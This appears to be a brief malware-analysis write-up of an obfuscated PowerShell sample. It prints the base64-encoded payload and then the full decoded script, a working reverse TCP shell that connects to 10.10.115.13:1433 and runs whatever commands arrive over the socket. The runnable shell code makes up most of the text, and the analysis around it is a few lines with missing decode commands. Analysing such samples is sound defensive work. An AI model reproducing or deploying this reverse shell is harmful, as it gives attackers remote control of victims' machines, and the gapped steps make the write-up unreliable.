Malicious Powershell Script
Last updated
Last updated
Sample name - Malware.PSObfusc.ps1.malz Malware Type - Reverse shell
Script - This malware is holding the malicious part inside of a base64 string and executing it.
The base 64 code -
tVVpbxMxEP2cSv0PVhqhRLAm6cVRgVTSg0q91EScQsi7mSSmjr14vWlLyX/H115JKEUUJ9pj5s2befbYu7b2MKO+s7qyhh5k3M11Lq5A9sbAGLqAKcgEUL97jqYbeOuvuRZHeIOOpoSjHuURXP4b113Dcx1S9TYNkYRYJFQJeYOIQiOqxmmIIzF5SnUtQWJreRob4YkRHkgnPFBRjHOuAwCGhhIAKYEGghMFKKQqEpQb1s4b+elku//s8MXF6fNpSEI+/JBunmwfx6Mf6vv2x84m/i8aH2oYMvNrRIwCV+gVavCUMW1tJEoCmZQtYTocgixbriRVVcuAKFJ+l5CkrMyr9HLcrq4YKQ0aa0e908bm39nCnY2698RCmqDO5sbG6kqtqO4UroKz8BtESj8q3BPRJagE96O4ayFNzfnEhbd2TGShwnHgQ1A9a2s6QC6qRP3mRsHnL6jTXt+0GOCRGFA+qqL6cK3wbhJRuu/9FpzPSQl6dIZd0vfW2fRltUoBeDdV4oClydgUq2QKrjxdSqItbfM2EGbqanmIZWvWz3uv65YqBxRxPhO+ADJoerFPUFvPkXvGx8BHauzCa3SImj40GCnUbnm6Wr6u9v4Y5VPi51M/zbEbEs86M9cZuhpTBijTjvc00+6UUEZCBg75u/SV7LgvqV88H2GtTsdc2b7ZalZC3opHfCouIdi/jrUpoYKjoCsmE8IHXt/660cd9BOdpSpw2lwyrSEiKhovoWx8xfvXEcTKsC2LdLcuAyKDd0RSIxoFp2QCqG5y1j2wwZwOTenIvTDvtnrZMql6k4jU7pG2xxbdsBAI88uPblHRMhXXDpohYPp7UEawzJXRVzsyKz1Jw8T3hi0u74vWTh7oqn78yrsKR1bsvKdopMo8ZO7lU+wKqldWw7WlvhSM5d7T2PJ6V5YYH3EOsng90X1ERmBDhpQTxlzf2Vn3B0LAwR2Creom7jKRgO/nzLZHk7iwLpfkoFbSLEvlT7uFVH7LVVJl2/AeqRy0msofyQup/DFbSeVt90nloNVU/oheSOX71BLdSeqAVVK/dedJ/9g+OYE9Ke4Xnm9wE/y5d5MomODD7peXL7uCMf2BsNXPfgE=We put this script as a variable in powershell-
We then decrypt it using-
write-host $megasusThe malicious script in question -
########################################################################";
# #";
# PowerShell Reverse TCP v3.5 #";
# by Ivan Sincek #";
# #";
# GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp. #";
# Feel free to donate bitcoin at 1BrZM6T7G9RN8vbabnfXu4M6Lpgztq6Y14. #";
# #";
#########################################################################";
$client = $null;
$stream = $null;
$buffer = $null;
$writer = $null;
$data = $null;
$result = $null;
try {
$ip = "10.10.115.13"
$port = 1433
$client = New-Object Net.Sockets.TcpClient($ip, $port);
$stream = $client.GetStream();
$buffer = New-Object Byte[] 1024;
$encoding = New-Object Text.AsciiEncoding;
$writer = New-Object IO.StreamWriter($stream);
$writer.AutoFlush = $true;
$bytes = 0;
do {
$writer.Write("PS>");
do {
$bytes = $stream.Read($buffer, 0, $buffer.Length);
if ($bytes -gt 0) {
$data = $data + $encoding.GetString($buffer, 0, $bytes); }
} while ($stream.DataAvailable);
if ($bytes -gt 0) {
$data = $data.Trim();
if ($data.Length -gt 0) {
try {
$result = Invoke-Expression -Command $data 2>&1 | Out-String;
} catch {
$result = $_.Exception | Out-String;
}
Clear-Variable -Name "data";
$length = $result.Length;
if ($length -gt 0) {
$count = 0;
do {
if ($length -ge $buffer.Length) { $bytes = $buffer.Length; } else { $bytes = $length; }
$writer.Write($result.substring($count, $bytes));
$count += $bytes;
$length -= $bytes;
} while ($length -gt 0);
Clear-Variable -Name "result";
}
}
}
} while ($bytes -gt 0);
} catch {
$_.Exception.InnerException.Message;
} finally {
if ($writer -ne $null) {
$writer.Close();
$writer.Dispose();
Clear-Variable -Name "writer";
}
if ($stream -ne $null) {
$stream.Close();
$stream.Dispose();
Clear-Variable -Name "stream";
}
if ($client -ne $null) {
$client.Close();
$client.Dispose();
Clear-Variable -Name "client";
}
if ($buffer -ne $null) {
$buffer.Clear();
Clear-Variable -Name "buffer";
}
if ($result -ne $null) {
Clear-Variable -Name "result";
}
if ($data -ne $null) {
Clear-Variable -Name "data";
}
[System.GC]::Collect();
}This seems to be a reverse tcp shell connecting to 10.10.115.13 : 1433
